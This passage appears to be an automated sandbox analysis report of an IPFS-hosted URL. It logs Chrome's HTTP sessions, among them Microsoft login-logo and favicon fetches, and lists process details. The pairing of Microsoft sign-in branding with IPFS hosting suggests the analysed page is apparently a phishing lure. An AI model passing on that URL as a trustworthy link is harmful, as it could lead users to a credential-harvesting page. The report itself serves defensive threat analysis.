2024-05-22 22:16:11 UTC	627	OUT	GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1 Host: logincdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-22 22:16:12 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 5079675 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Wed, 22 May 2024 22:16:12 GMT Etag: 0x8DB77257FFE6B4E Last-Modified: Tue, 27 Jun 2023 15:45:14 GMT Server: ECAcc (lhd/35D9) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 0b4e8a4e-701e-0078-2e62-7ef037000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-05-22 22:16:12 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	209.94.90.1	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:12 UTC	622	OUT	GET /favicon.ico HTTP/1.1 Host: ipfs.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-22 22:16:12 UTC	325	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 22 May 2024 22:16:12 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://ipfs.tech/favicon.ico x-ipfs-pop: rainbow-dc13-01 CF-Cache-Status: HIT Age: 191 Server: cloudflare CF-RAY: 88802b54aa3341fe-EWR alt-svc: h3=":443"; ma=86400
2024-05-22 22:16:12 UTC	175	IN	Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.25.5</center></body></html>
2024-05-22 22:16:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49757	2.19.104.72	443

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:12 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-22 22:16:12 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=64367 Date: Wed, 22 May 2024 22:16:12 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49770	169.150.247.39	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:13 UTC	571	OUT	GET /favicon.ico HTTP/1.1 Host: ipfs.tech Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-22 22:16:13 UTC	1722	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 22:16:13 GMT Content-Type: image/x-icon Content-Length: 15086 Connection: close Vary: Accept-Encoding Server: BunnyCDN-DE1-1082 CDN-PullZone: 2016121 CDN-Uid: 070ccd6e-b4b0-4c90-b45a-e26d7534205d CDN-RequestCountryCode: US Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Headers: Range Access-Control-Allow-Headers: User-Agent Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET Access-Control-Allow-Methods: HEAD Access-Control-Allow-Methods: OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length Access-Control-Expose-Headers: Content-Range Access-Control-Expose-Headers: X-Chunked-Output Access-Control-Expose-Headers: X-Ipfs-Path Access-Control-Expose-Headers: X-Ipfs-Roots Access-Control-Expose-Headers: X-Stream-Output Cache-Control: max-age=60, stale-while-revalidate=3600 ETag: "QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT" CDN-CachedAt: 04/28/2024 13:52:02 X-Ipfs-Path: /ipfs/bafybeigi77rim3p5tw3upw2ca4ep5ng7uaarvrz46zidd2ai6cjh46yxoy/favicon.ico X-Ipfs-Roots: bafybeigi77rim3p5tw3upw2ca4ep5ng7uaarvrz46zidd2ai6cjh46yxoy,QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT Strict-Transport-Security: max-age=31536000; includeSubDomains X-Request-ID: d11de914c93bce2139a1bcd4aa45debb Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: upgrade-insecure-requests X-XSS-Protection: 0 X-Content-Type-Options: nosniff X-Cache-Status: MISS CDN-ProxyVer: 1.04 CDN-RequestPullCode: 200 CDN-RequestPullSuccess: True CDN-EdgeStorageId: 1081 CDN-Status: 200 CDN-RequestId: 520d32946f5ba25bfe5d72493d344435 CDN-Cache: HIT Accept-Ranges: bytes
2024-05-22 22:16:13 UTC	15086	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 00 %6 % h6(0` $

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49773	2.19.104.72	443

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:13 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-22 22:16:13 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=64468 Date: Wed, 22 May 2024 22:16:13 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-22 22:16:13 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49771	192.229.221.185	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:13 UTC	400	OUT	GET /shared/5/images/microsoft_logo_ee5c8d9fb6248c938fd0.svg HTTP/1.1 Host: logincdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-22 22:16:13 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 5079676 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Wed, 22 May 2024 22:16:13 GMT Etag: 0x8DB77257FFE6B4E Last-Modified: Tue, 27 Jun 2023 15:45:14 GMT Server: ECAcc (lhd/35D9) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 0b4e8a4e-701e-0078-2e62-7ef037000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-05-22 22:16:13 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49778	185.93.3.244	443	5724	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-22 22:16:14 UTC	344	OUT	GET /favicon.ico HTTP/1.1 Host: ipfs.tech Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-22 22:16:14 UTC	1720	IN	HTTP/1.1 200 OK Date: Wed, 22 May 2024 22:16:14 GMT Content-Type: image/x-icon Content-Length: 15086 Connection: close Vary: Accept-Encoding Server: BunnyCDN-ES1-895 CDN-PullZone: 2016121 CDN-Uid: 070ccd6e-b4b0-4c90-b45a-e26d7534205d CDN-RequestCountryCode: US Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Headers: Range Access-Control-Allow-Headers: User-Agent Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET Access-Control-Allow-Methods: HEAD Access-Control-Allow-Methods: OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length Access-Control-Expose-Headers: Content-Range Access-Control-Expose-Headers: X-Chunked-Output Access-Control-Expose-Headers: X-Ipfs-Path Access-Control-Expose-Headers: X-Ipfs-Roots Access-Control-Expose-Headers: X-Stream-Output Cache-Control: max-age=60, stale-while-revalidate=3600 ETag: "QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT" CDN-CachedAt: 04/28/2024 13:51:27 X-Ipfs-Path: /ipfs/bafybeigi77rim3p5tw3upw2ca4ep5ng7uaarvrz46zidd2ai6cjh46yxoy/favicon.ico X-Ipfs-Roots: bafybeigi77rim3p5tw3upw2ca4ep5ng7uaarvrz46zidd2ai6cjh46yxoy,QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT Strict-Transport-Security: max-age=31536000; includeSubDomains X-Request-ID: d11de914c93bce2139a1bcd4aa45debb Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: upgrade-insecure-requests X-XSS-Protection: 0 X-Content-Type-Options: nosniff X-Cache-Status: MISS CDN-ProxyVer: 1.04 CDN-RequestPullCode: 200 CDN-RequestPullSuccess: True CDN-EdgeStorageId: 895 CDN-Status: 200 CDN-RequestId: 3bb052ec8a5dc4ad6bbc27c9ffa51080 CDN-Cache: HIT Accept-Ranges: bytes
2024-05-22 22:16:14 UTC	15086	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 00 %6 % h6(0` $

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 1596, Parent PID: 5844

General

Target ID:	0
Start time:	18:16:01
Start date:	22/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5724, Parent PID: 1596

General

Target ID:	1
Start time:	18:16:05
Start date:	22/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2200,i,8465809809260521268,2692650552825108474,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6360, Parent PID: 5844

General

Target ID:	3
Start time:	18:16:08
Start date:	22/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmcZHgPdjzKZwSiGDPgHLVRcxMeWQsVgbWsmJC6BiQv1cS/"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly